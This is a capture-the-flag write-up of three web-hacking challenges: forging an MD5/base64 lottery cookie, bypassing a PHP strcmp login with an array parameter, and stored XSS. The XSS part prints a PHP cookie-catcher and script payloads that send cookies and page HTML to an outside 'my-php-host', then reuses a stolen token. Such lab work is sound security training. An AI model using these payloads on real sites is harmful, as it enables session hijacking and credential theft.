We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!
The page looks like this:
The cookie changes when the page is refreshed, using a new browser session. In this session, my cookie was
lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of
lotinfo seems to be a base64 encoded string.
$ base64 -d MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU= 29f2299ca4b26fbf42c23ee47c401125
Now, we have some kind of hash, 32 digits long. It can be a message-digest hash. Let's try to encrypt the ticket using the MD5 algorithm.
$ md5 1337810218 29F2299CA4B26FBF42C23EE47C401125
Nice! Now, we know that
cookie = random_ID:base64(md5(ticket)). Since our goal is to win the lottery, all we need to do is to change the session cookie, using the winning ticket.
$ md5 1337500001 D50796F06CB23BE1A80284F80EAC0C2D $ base64 d50796f06cb23be1a80284f80eac0c2d ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ=
A friend has a service online and he says that he will never get hacked with his new bullet proof authentication mechanism. Can you prove him wrong?
This was the login page (it's not working since I'm not running PHP):
When we submit the form, a new message shows up:
Let's try to search for
strcmp vulnerabilities. The
strcmp (string $str1, string $str2) function returns 0 if
$str2 are equal. When we inject an array in the GET password parameter we can bypass this comparison:
By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?
This was the login page (it's not working since i'm not running the backend):
When we try to login using a random username and password the following message appears:
"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:
<?php $data = $_GET['data']; $f = fopen("log.txt", "a"); fwrite($f, $data."\n"); fclose($f); ?>
Let's inject a script in the username:
<script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>
Suddenly, this hint pops up:
Let's try to get the document HTML:
<script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>. It worked!
<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td>192.168.2.10</td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td>127.0.0.1</td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>
This HTML code looks like this:
remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a
If we try to login using the username Xiene1337 and setting
document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:
The passwords in the log table may be MD5 hashes. Let's try to find them in MD5 databases.
|MD5 Hash||Original password|
These passwords were mistyped by Xiene1337, since they are very similar. To find the correct password, just look to your keyboard! The correct password is ljbo.